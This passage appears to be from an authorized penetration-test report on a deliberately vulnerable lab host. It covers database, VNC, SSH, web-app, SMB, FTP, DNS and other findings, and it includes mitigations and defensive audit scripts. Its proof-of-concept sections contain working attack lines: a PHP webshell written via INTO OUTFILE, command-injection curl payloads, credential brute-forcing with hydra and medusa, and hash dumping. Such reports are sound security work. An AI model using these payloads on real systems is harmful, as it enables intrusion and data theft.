Proof of Concept.

$ mysql -h 192.168.229.132 -u root
mysql> SELECT version(), current_user();
=> 5.0.51a-3ubuntu5 | root@%
mysql> SELECT user,host,password FROM mysql.user; # full dump of all hashes
# Escalation: SELECT '<?php system($_GET[c]);?>' INTO OUTFILE '/var/www/x.php';

Impact. Full database compromise (read/modify/delete all data) and a path to file write / OS command execution.

Mitigation.

  • Set a strong password for root; remove anonymous and wildcard-host accounts.
  • Bind MySQL to localhost (bind-address=127.0.0.1); firewall 3306.
  • Disable LOCAL INFILE/FILE privilege where not required; apply least privilege to application accounts.

C13 — PostgreSQL Default Credentials

  • Affected component: PostgreSQL 8.3.1, TCP 5432
  • Severity: Critical — CVSS 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L)

Description. The PostgreSQL superuser postgres accepts the default password postgres from the network. A superuser can read/write arbitrary database content and, via COPY ... FROM PROGRAM (or large-object import/export and UDFs), read or write files and execute operating-system commands.

Proof of Concept.

$ psql -h 192.168.229.132 -U postgres # password: postgres
postgres=# SELECT version();
=> PostgreSQL 8.3.1 ...
# Escalation paths: COPY ... FROM PROGRAM 'id'; (newer) / lo_import + UDF (this era)

Impact. Full database compromise and a path to file write / OS command execution.

Mitigation.

  • Set a strong password for postgres; remove default credentials.
  • Restrict pg_hba.conf to specific trusted hosts with scram-sha-256.
  • Bind to localhost where possible; firewall 5432.

HIGH


H1 — VNC Weak Password (Open)

  • Affected component: VNC server, TCP 5900 (protocol 3.3)
  • Severity: High — CVSS 8.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. The VNC service is protected only by the trivially guessable password password. The VNC 3.3 protocol additionally transmits screen and input over a weak challenge-response with no transport encryption. A successful login yields a full interactive graphical desktop session, here running with root privileges.

Proof of Concept.

$ hydra -P passwords.txt 192.168.229.132 vnc
=> [5900][vnc] host: 192.168.229.132 password: password (SUCCESS)
$ vncviewer 192.168.229.132 # interactive root desktop

Impact. Unauthenticated-in-practice remote graphical control of the host as root.

Mitigation.

  • Set a strong VNC password; better, disable native VNC auth and tunnel VNC exclusively over SSH (-via) or a VPN.
  • Bind VNC to localhost; firewall 5900.

H2 — Default OS Credentials msfadmin:msfadmin over SSH + Telnet (Open)

  • Affected component: OpenSSH (TCP 22), Telnet (TCP 23)
  • Severity: High — CVSS 8.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L)

Description. The interactive Linux account msfadmin uses the password msfadmin and has full sudo rights (passwordless root escalation). The same credentials are also accepted over cleartext Telnet, which additionally exposes the entire session — including the password — to any on-path attacker.

Proof of Concept.

$ medusa -h 192.168.229.132 -u msfadmin -p msfadmin -M ssh
=> ACCOUNT FOUND: [ssh] User: msfadmin Pass: msfadmin [SUCCESS]
$ ssh msfadmin@192.168.229.132 # then: sudo -i → root
# Same credentials succeed on telnet 23 (cleartext).

Impact. Authenticated foothold that escalates to root via sudo; credential exposure over cleartext Telnet.

Mitigation.

  • Remove/disable default accounts; enforce strong, unique passwords and SSH key-based authentication.
  • Disable Telnet entirely (see M5); restrict sudo to least privilege.
  • Deploy MFA and brute-force protection (fail2ban / account lockout).

H3 — Deliberately Vulnerable Web Applications

  • Affected component: Apache (TCP 80) — /dvwa, /mutillidae, /tikiwiki, /twiki
  • Severity: High — CVSS 8.0+ (multiple)

Description. The web root hosts several intentionally vulnerable training applications. DVWA and Mutillidae expose SQL injection, cross-site scripting, command injection, and LFI/RFI. TikiWiki is affected by CVE-2007-5423 (tiki-graph_formula.php command injection → RCE) and TWiki by CVE-2005-2877 (%SEARCH{}%/debugenableplugins command execution → RCE). Several of these give direct, unauthenticated code execution.

Proof of Concept.

# TikiWiki graph_formula RCE (CVE-2007-5423)
$ curl "http://192.168.229.132/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=x"
=> phpinfo() rendered → arbitrary PHP execution

# Mutillidae command injection (DNS lookup form)
$ curl "http://192.168.229.132/mutillidae/index.php?page=dns-lookup.php" \
--data "target_host=127.0.0.1;id&dns-lookup-php-submit-button=Lookup+DNS"
=> uid=33(www-data)

Impact. Multiple unauthenticated paths to data theft and code execution (www-data), pivoting to root via the local root findings.

Mitigation.

  • Remove all training/demo applications from any reachable system; they must never be deployed on a host that touches a network.
  • If a deliberately vulnerable app is needed for training, isolate it on a disposable, network-segmented VM.

H4 — phpMyAdmin Exposed

  • Affected component: /phpMyAdmin/ on TCP 80
  • Severity: High — CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

Description. A phpMyAdmin instance is reachable without network restriction and fronts the MySQL server. Combined with the blank-password MySQL root account (C12), it provides a convenient browser-based interface to full database control, arbitrary SQL, and file write (INTO OUTFILE) into the web root.

Proof of Concept.

$ curl -s http://192.168.229.132/phpMyAdmin/ | grep -i 'phpMyAdmin'
=> phpMyAdmin login page served
# Log in as root with a blank password (C12) → full DB + SQL console

Impact. Browser-based full database compromise and a path to web-root file write / RCE.

Mitigation.

  • Remove phpMyAdmin if unused; otherwise require authentication, restrict by source IP, and serve only over TLS.
  • Fix the underlying database credential weakness (C12).

H5 — Anonymous SMB Share Access

  • Affected component: Samba (TCP 139/445)
  • Severity: High — CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Description. The Samba server permits anonymous (null-session) access to the tmp and opt shares over the deprecated SMBv1 dialect. Unauthenticated users can enumerate shares and browse/read their contents, leaking information and providing a staging area for further attacks.

Proof of Concept.

$ smbclient -L //192.168.229.132 -N
=> tmp Disk oh noes!
opt Disk
$ smbclient //192.168.229.132/tmp -N
smb: \> ls # anonymous directory listing succeeds

Impact. Unauthenticated information disclosure and a writable staging foothold; combined with C3 leads to root.

Mitigation.

  • Require authentication on all shares (map to guest = never, restrict anonymous = 2); remove unnecessary shares.
  • Disable SMBv1 (see M2); enforce SMB signing; restrict to trusted subnets.

H6 — ProFTPD 1.3.1 Known-Vulnerable Build

  • Affected component: ProFTPD 1.3.1, TCP 2121
  • Severity: High — CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Description. The banner-reported ProFTPD 1.3.1 build predates fixes for CVE-2009-0542 / CVE-2009-0543 (mod_sql SQL-injection enabling authentication bypass) and CVE-2008-4242 (session handling). These allow credential bypass and information disclosure against the FTP service. (Note: the widely known mod_copy RCE, CVE-2015-3306, affects ProFTPD 1.3.5 and does not apply to this 1.3.1 build.)

Proof of Concept.

$ nc 192.168.229.132 2121
=> 220 ProFTPD 1.3.1 Server (ProFTPD Default Installation) ...
# Version maps to CVE-2009-0542 / CVE-2009-0543 (mod_sql auth bypass)

Impact. Authentication bypass / information disclosure on the FTP service via known CVEs.

Mitigation.

  • Upgrade ProFTPD to a current supported release, or decommission the service.
  • If mod_sql is used, patch and parameterize queries; restrict FTP to TLS (FTPS) and trusted networks.

MEDIUM


M1 — SMTP User Enumeration via VRFY/EXPN

  • Affected component: Postfix, TCP 25
  • Severity: Medium — CVSS 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Description. The mail service answers VRFY/EXPN requests, allowing an attacker to confirm which local accounts exist by observing differing response codes. Valid accounts return 252, unknown accounts 550. Enumerated usernames feed password-guessing against SSH/Telnet/VNC.

Proof of Concept.

$ nc 192.168.229.132 25
VRFY root => 252 2.0.0 root
VRFY msfadmin => 252 2.0.0 msfadmin
VRFY nosuchuser => 550 5.1.1 <nosuchuser>: Recipient address rejected

Impact. Account enumeration that strengthens credential-attack campaigns.

Mitigation.

  • Disable VRFY and EXPN (disable_vrfy_command = yes in Postfix).
  • Apply rate-limiting/greylisting; restrict SMTP to required senders.

M2 — SMBv1 Enabled (NT LM 0.12)

  • Affected component: Samba (TCP 139/445)
  • Severity: Medium — CVSS 5.9 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N)

Description. The server negotiates the deprecated SMBv1 (NT LM 0.12) dialect. SMBv1 lacks modern integrity protections and is susceptible to downgrade, man-in-the-middle, and NTLM-relay attacks; it is the protocol family historically abused by worms built on EternalBlue-class exploits.

Proof of Concept.

$ nmap -p445 --script smb-protocols 192.168.229.132
=> dialects: NT LM 0.12 (SMBv1) [dangerous, but default]

Impact. Exposure to relay/MITM and protocol-level attacks.

Mitigation.

  • Disable SMBv1 (server min protocol = SMB2_10 or higher).
  • Enforce SMB signing; require authentication; segment SMB traffic.
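The H5 and M2 mitigations above map to a handful of smb.conf keys. The following is an added example, not part of the report, that audits a Samba configuration for those keys; both config fragments are constructed samples, not the target's real smb.conf, and the "not set explicitly" result is deliberate because Samba's built-in defaults differ between versions.

```python
import configparser

# Constructed sample smb.conf fragments (not taken from the target host).
WEAK_SMB_CONF = """
[global]
map to guest = Bad User
restrict anonymous = 0
server min protocol = NT1
server signing = auto

[tmp]
path = /tmp
guest ok = yes
"""

HARDENED_SMB_CONF = """
[global]
map to guest = never
restrict anonymous = 2
server min protocol = SMB2_10
server signing = mandatory

[tmp]
path = /tmp
guest ok = no
valid users = @staff
"""

# Samba dialect names that still mean "SMBv1 allowed".
SMB1_DIALECTS = {"core", "coreplus", "lanman1", "lanman2", "nt1"}

def _check(section, key, ok, fid, advice, issues):
    """Record an issue when the key is absent or its value fails the predicate."""
    raw = section.get(key)
    if raw is None:
        issues.append((fid, f"'{key}' not set explicitly; set '{key} = {advice}'"))
    elif not ok(raw.strip().lower()):
        issues.append((fid, f"'{key} = {raw.strip()}' is weak; set '{key} = {advice}'"))

def audit_smb_conf(text):
    """Return [(finding_id, message)] for the settings called out in H5 and M2."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    g = cp["global"] if cp.has_section("global") else {}
    issues = []
    _check(g, "map to guest", lambda v: v == "never", "H5", "never", issues)
    _check(g, "restrict anonymous", lambda v: v == "2", "H5", "2", issues)
    _check(g, "server min protocol", lambda v: v not in SMB1_DIALECTS, "M2", "SMB2_10", issues)
    _check(g, "server signing", lambda v: v == "mandatory", "M2", "mandatory", issues)
    for share in cp.sections():  # per-share guest access is what made tmp/opt browsable
        if share in ("global", "printers", "print$"):
            continue
        if cp[share].get("guest ok", "no").strip().lower() in ("yes", "true", "1"):
            issues.append(("H5", f"share [{share}] permits guest (anonymous) access"))
    return issues
```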

M3 — Legacy / Cleartext FTP Daemons

  • Affected component: vsftpd (TCP 21), ProFTPD (TCP 2121)
  • Severity: Medium — CVSS 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Description. Two outdated FTP daemons are network-reachable pre-authentication. FTP transmits credentials and data in cleartext and these specific builds are end-of-life (and, for vsftpd 2.3.4, backdoored — see C1). Exposed legacy FTP both leaks credentials in transit and widens the attack surface.

Proof of Concept.

$ nc 192.168.229.132 21 => 220 (vsFTPd 2.3.4)
$ nc 192.168.229.132 2121 => 220 ProFTPD 1.3.1 Server ...
# Both pre-auth reachable; FTP AUTH is cleartext on the wire.

Impact. Credential interception and exposure to service-specific CVEs (C1, H6).

Mitigation.

  • Replace FTP with SFTP (over SSH) or enforce FTPS (TLS).
  • Decommission unused daemons; disable anonymous access; restrict to trusted hosts.

M4 — OpenSSH 4.7p1 / Debian Predictable-PRNG Era (CVE-2008-0166)

  • Affected component: OpenSSH 4.7p1 Debian, TCP 22
  • Severity: Medium — CVSS 5.6 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

Description. This OpenSSH build dates from the Debian/Ubuntu OpenSSL weak-PRNG window (CVE-2008-0166), during which the random-number generator produced only ~32,767 distinct values. Any SSH host or user keys generated on an affected system in that period are drawn from a small, pre-computable set and can be brute-forced offline, enabling key-based authentication bypass or host-key impersonation.

Proof of Concept.

$ nmap -p22 -sV 192.168.229.132
=> OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
# Any keys generated in the vulnerable window are in the public weak-key sets
# (e.g. g0tmi1k / Debian OpenSSL blacklists) → offline key recovery.

Impact. Potential authentication bypass via brute-forced weak keys; host-key spoofing for MITM.

Mitigation.

  • Regenerate all SSH host and user keys on a patched system; revoke old keys.
  • Upgrade OpenSSH/OpenSSL to current releases; enforce strong key types (ed25519) and disable weak algorithms.

M5 — Cleartext Protocols In Use

  • Affected component: Telnet (23), r-services (512–514), FTP (21/2121), HTTP (80), VNC (5900)
  • Severity: Medium — CVSS 5.9 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N)

Description. Multiple services transmit credentials and session data without encryption. An attacker positioned on the network path (ARP spoofing, rogue switch port, span) can passively capture login credentials, session cookies, and command output, then replay or reuse them. This compounds every credential-based finding (H1, H2).

Proof of Concept.

# On-path capture (illustrative)
$ tcpdump -i ens33 -A 'tcp port 23 or tcp port 21'
# Telnet/FTP USER/PASS appear in plaintext within the captured stream.

Impact. Credential theft and session hijacking by any on-path adversary.

Mitigation.

  • Eliminate cleartext services: replace Telnet/r-services with SSH, FTP with SFTP/FTPS, HTTP with HTTPS, and tunnel VNC over SSH/VPN.
  • Enforce network segmentation and switch-port security (DAI, port security) to limit on-path positioning.

M6 — DNS Open Recursive Resolver (BIND 9.4.2)

  • Affected component: ISC BIND 9.4.2, UDP 53
  • Severity: Medium — CVSS 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Description. The DNS server performs recursion for arbitrary external clients. Open recursive resolvers are abused as DDoS amplification/reflection vectors (small spoofed query → large response sent to a victim) and the EOL BIND 9.4.2 is additionally exposed to cache-poisoning weaknesses of the Kaminsky era (CVE-2008-1447).

Proof of Concept.

$ dig @192.168.229.132 google.com A +short
=> returns recursively resolved answers (recursion available for any client)
$ nmap -sU -p53 --script dns-recursion 192.168.229.132
=> Recursion appears to be enabled

Impact. Participation in DDoS amplification attacks against third parties; cache-poisoning / response-spoofing exposure for local clients.

Mitigation.

  • Disable open recursion: recursion no; for public-facing roles, or restrict with allow-recursion { trusted; };.
  • Upgrade BIND to a supported release; enable response-rate-limiting (RRL) and source-port/QID randomization (DNS cookies / DNSSEC validation).
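The dig and nmap checks in the M6 proof of concept both reduce to one header test: does the server answer a recursion-desired query for a foreign name with RA set and RCODE NOERROR? The following is an added example, not part of the report, that performs that test; the two reply packets are constructed samples, and probe() is the only function that touches the network (it sends the query to a resolver you administer).

```python
import socket
import struct

def build_query(name, qid=0x1234):
    """Minimal DNS A/IN query with RD (recursion desired) set; flags 0x0100 = RD."""
    header = struct.pack(">HHHHHH", qid, 0x0100, 1, 0, 0, 0)  # QDCOUNT=1
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    return header + qname + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN

def parse_flags(response, expected_id):
    """Return (rcode, recursion_available) from a DNS response header."""
    if len(response) < 12:
        raise ValueError("short DNS response")
    qid, flags = struct.unpack(">HH", response[:4])
    if qid != expected_id:
        raise ValueError("transaction ID mismatch")
    if not flags & 0x8000:  # QR bit must be set on a response
        raise ValueError("not a response (QR bit clear)")
    return flags & 0x000F, bool(flags & 0x0080)  # RCODE, RA

def is_open_resolver(response, expected_id):
    """Same heuristic as nmap's dns-recursion: RA set and NOERROR for a name we are not authoritative for."""
    rcode, ra = parse_flags(response, expected_id)
    return ra and rcode == 0

def probe(host, name="example.com", timeout=3.0):
    """Send the query over UDP/53 and evaluate the reply (network access; not used offline)."""
    qid = 0x1234
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, qid), (host, 53))
        data, _ = s.recvfrom(4096)
    return is_open_resolver(data, qid)

# Constructed sample replies (not captured from any host):
# open resolver: QR=1 RD=1 RA=1 RCODE=0  -> flags 0x8180
OPEN_REPLY = struct.pack(">HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
# hardened resolver ("recursion no" / outside allow-recursion): QR=1 RD=1 RA=0 RCODE=5 REFUSED -> 0x8105
REFUSED_REPLY = struct.pack(">HHHHHH", 0x1234, 0x8105, 1, 0, 0, 0)
```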

LOW / INFORMATIONAL


L1 — End-of-Life Operating System

  • Component: Ubuntu 8.04 LTS, Linux kernel 2.6.24 (i686)
  • Severity: Low/Info (systemic — elevates every other finding)

Description. The OS and kernel receive no security updates. Numerous local privilege-escalation exploits apply (e.g. udev CVE-2009-1185, sock_sendpage CVE-2009-2692), so any low-privileged code-execution foothold becomes root.

PoC. uname -a → Linux metasploitable 2.6.24-16-server i686 (matches known local-root exploit targets).

Mitigation. Rebuild on a current, supported, patched OS; establish a patch-management cycle.


L2 — phpinfo.php Exposed

  • Component: Apache (TCP 80), /phpinfo.php
  • Severity: Low/Info

Description. A phpinfo() page is publicly reachable, disclosing absolute paths, loaded modules, environment variables, and PHP configuration — valuable reconnaissance for an attacker.

PoC. curl http://192.168.229.132/phpinfo.php → full PHP configuration page.

Mitigation. Remove phpinfo.php and any diagnostic scripts from web roots.


L3 — Verbose Version Banners

  • Component: FTP / SSH / SMTP / HTTP / SMB
  • Severity: Low/Info

Description. Services advertise exact product and version strings, letting attackers map directly to known CVEs without active probing.

PoC. nmap -sV 192.168.229.132 returns precise versions for every service.

Mitigation. Suppress/obfuscate banners where supported (ServerTokens Prod, ServerSignature Off, Postfix smtpd_banner, etc.). Note this is defense-in-depth, not a fix for the underlying versions.


L4 — Default/Test Directories Present

  • Component: Apache (TCP 80), /test/, /cgi-bin/
  • Severity: Low/Info

Description. Leftover default and test directories expand the attack surface and may host scripts with their own weaknesses.

PoC. curl -I http://192.168.229.132/test/ → 200/403 indicating presence.

Mitigation. Remove unused directories and sample/CGI scripts; serve only required content.


L5 — HTTP TRACE / WebDAV Verbs Enabled

  • Component: Apache (TCP 80)
  • Severity: Low/Info

Description. Non-standard HTTP methods (TRACE, and WebDAV PUT/DELETE/MOVE) are enabled site-wide. TRACE can aid cross-site tracing; the write verbs are the basis of the C10 RCE.

PoC. curl -X OPTIONS -i http://192.168.229.132/ → Allow: header lists PUT,DELETE,MOVE,TRACE.

Mitigation. Disable TRACE (TraceEnable Off) and restrict/disable WebDAV write methods except where explicitly required and authenticated.


L6 — AJP13 Connector Exposed (TCP 8009)

  • Component: Apache Tomcat AJP connector
  • Severity: Low/Info

Description. The AJP13 binary connector is reachable on the network. The well-known Ghostcat vulnerability (CVE-2020-1938) affects Tomcat 6/7/8/9 and does not apply to this Tomcat 5.5-era Coyote 1.1 connector; however, an exposed AJP connector is an internal-by-design interface that should not face untrusted networks (generic request-injection/SSRF-style risk).

PoC. Port 8009 open and speaking AJP13 (nmap -p8009 -sV).

Mitigation. Bind AJP to localhost, or firewall 8009; set a secret on the connector; disable it if the reverse-proxy fronting is not used.


L7 — X11 Server Exposed but Access-Controlled

  • Component: X11 (TCP 6000)
  • Severity: Low/Info

Description. An X11 server listens on the network. Access to display :0 was tested and denied (host-based access control is active), so screen capture / keystroke injection is not currently possible. The exposed TCP listener remains a latent risk should xhost + ever be set.

PoC. xdpyinfo -display 192.168.229.132:0 → No protocol specified / access denied (verified — not openly accessible).

Mitigation. Start X with -nolisten tcp; keep host-based access control; never run xhost +.


L8 — UDP Attack Surface (Coverage Confirmation)

  • Component: Full UDP range (nmap -sU -p-)
  • Severity: Low/Info

Description. A full privileged UDP sweep was completed for assurance. Aside from the DNS open resolver (M6) and the NFS/RPC sidecar daemons (covered under C8), no additional exploitable UDP service was found. 161/udp (SNMP) and 69/udp (TFTP) are closed. This item documents coverage completeness.

PoC. echo hacker | sudo -S nmap -sU -p- --min-rate 5000 192.168.229.132 → 7 ports open, all accounted for in §4.2.

Mitigation. Informational — maintain default-deny UDP firewalling for any non-essential service.


7. Attack Narrative

From an unauthenticated position on the network segment, root was achieved in seconds. Any single one of C1–C4, C7, C8, or C9 yields immediate unauthenticated root with no chaining.

A representative low-noise path: mount the wide-open NFS export (C8), append an attacker public key to /root/.ssh/authorized_keys, and log in cleanly over SSH as root — generating minimal service-log noise.

The two criticals that resisted the textbook approach were also driven to live code execution: C7 (Java RMI) produced a root Meterpreter session, and C6 (Ruby DRb) required defeating Ruby's $SAFE taint sandbox by pivoting to a raw Kernel#syscall primitive — proving the sandbox is not a security boundary. All 13 critical paths are therefore demonstrated, not theoretical.

The presence of the 1524 root bindshell (C4) indicates the host has already been backdoored by a third party and should be treated as an active incident.


8. Strategic Remediation Roadmap

Immediate (0–24h)

  1. Isolate the host from the network. It is EOL and backdoored; assume full compromise.
  2. Treat as an incident — the 1524 bindshell (C4) is a compromise indicator; preserve evidence, then rebuild.

Short term (rebuild)

  3. Rebuild on a supported, patched OS with a minimal service footprint.
  4. Remove trojaned packages (vsftpd 2.3.4, UnrealIRCd 3.2.8.1).
  5. Disable r-services, Telnet, distccd, DRb, Java RMI remote class loading, X11/TCP, and AJP exposure.
  6. NFS: drop the * wildcard, enforce root_squash, scope exports to specific hosts.
  7. Set strong unique credentials for MySQL, PostgreSQL, VNC, and Tomcat Manager (or disable the Manager).
  8. Disable SMBv1; require authenticated, signed SMB.

Hardening (baseline)

  9. Remove all training/demo web apps (DVWA, Mutillidae, TikiWiki, TWiki, phpMyAdmin, phpinfo).
  10. Enforce SSH key authentication; regenerate keys; disable passwords and weak algorithms.
  11. Disable DNS open recursion; upgrade/replace BIND; enable RRL.
  12. Implement host-based firewalling (default-deny), centralized logging, and file-integrity monitoring.


9. Appendix A — Per-Port Verification Matrix

Port | Finding | Status
21 vsftpd 2.3.4 | C1 backdoor | Open — uid=0 on :6200
22 ssh | H2 msfadmin:msfadmin | Open — medusa SUCCESS
23 telnet | H2 / M5 cleartext + creds | Open — creds valid
25 smtp | M1 VRFY enum | Open — root/msfadmin (252)
80 http | H3/H4/L2/L5 apps, C10 WebDAV RCE | Open — C10 www-data
111/2049/mountd | C8 NFS no_root_squash | Open — RW via nfs-statfs
139/445 samba | C3 usermap_script / H5 / M2 | Open — C3 root callback
512 rexec | r-services | Open; rejected empty auth
513/514 rlogin/rsh | C9 root trust | Open — uid=0 + shadow
1099 java-rmi | C7 classloader RCE | Open — meterpreter root
1524 bindshell | C4 root shell | Open — uid=0
2121 proftpd 1.3.1 | H6 mod_sql CVEs / M3 | Open — version confirmed
3306 mysql | C12 root:blank | Open — root@%
3632 distccd | C5 CVE-2004-2687 | Open — uid=1 daemon
5432 postgres | C13 postgres:postgres | Open — auth OK
5900 vnc | H1 weak password | Open — hydra
6000 X11 | L7 exposed | access denied (verified)
6667/6697 unrealircd | C2 backdoor | Open — uid=0
8009 ajp13 | L6 exposed | Ghostcat N/A this version
8180 tomcat | C11 tomcat:tomcat | Open — mgr HTTP 200
8787 drb | C6 DRb RCE | Open — $SAFE bypass via syscall
53/udp | M6 open resolver | Open — BIND 9.4.2 recursion

Live-Open RCE/access: C1, C2, C3, C4, C5, C6, C7, C8, C9, C10, C11, C12, C13, H1, H2 — 15 paths, including all 13 criticals.


10. Appendix B — CVSS Vectors & References

ID | CVE / Class | CVSS 3.1 Vector | Score
C1 | CVE-2011-2523 | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | 10.0
C2 | CVE-2010-2075 | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | 10.0
C3 | CVE-2007-2447 | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | 10.0
C4 | Bindshell / persistence | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | 10.0
C5 | CVE-2004-2687 | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 9.8
C6 | DRb / $SAFE bypass | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 9.8
C7 | Java RMI classloader | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 9.8
C8 | NFS no_root_squash | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 9.8
C9 | r-services trust | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 9.8
C10 | WebDAV PUT RCE | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 9.8
C11 | Tomcat default creds | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 9.8
C12 | MySQL blank root | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L | 9.1
C13 | Postgres default creds | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L | 9.1
H1 | VNC weak password | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 8.8
H2 | Default OS creds | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L | 8.1
H3 | CVE-2007-5423 / CVE-2005-2877 + app flaws | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N | 8.0+
H4 | phpMyAdmin exposure | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N | 7.5
H5 | Anonymous SMB | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 7.5
H6 | CVE-2009-0542 / 0543 | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 7.5
M1 | SMTP VRFY enum | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N | 5.3
M2 | SMBv1 | AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N | 5.9
M3 | Legacy FTP | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N | 5.3
M4 | CVE-2008-0166 | AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N | 5.6
M5 | Cleartext protocols | AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N | 5.9
M6 | BIND open resolver / CVE-2008-1447 | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | 6.5

Engagement conduct. All testing was authorized and confined to the in-scope host. Proof-of-concept payloads were non-destructive; the single evidence artifact created (an empty marker file via C6) was deleted. No data was exfiltrated and no service was disrupted.

— End of report —
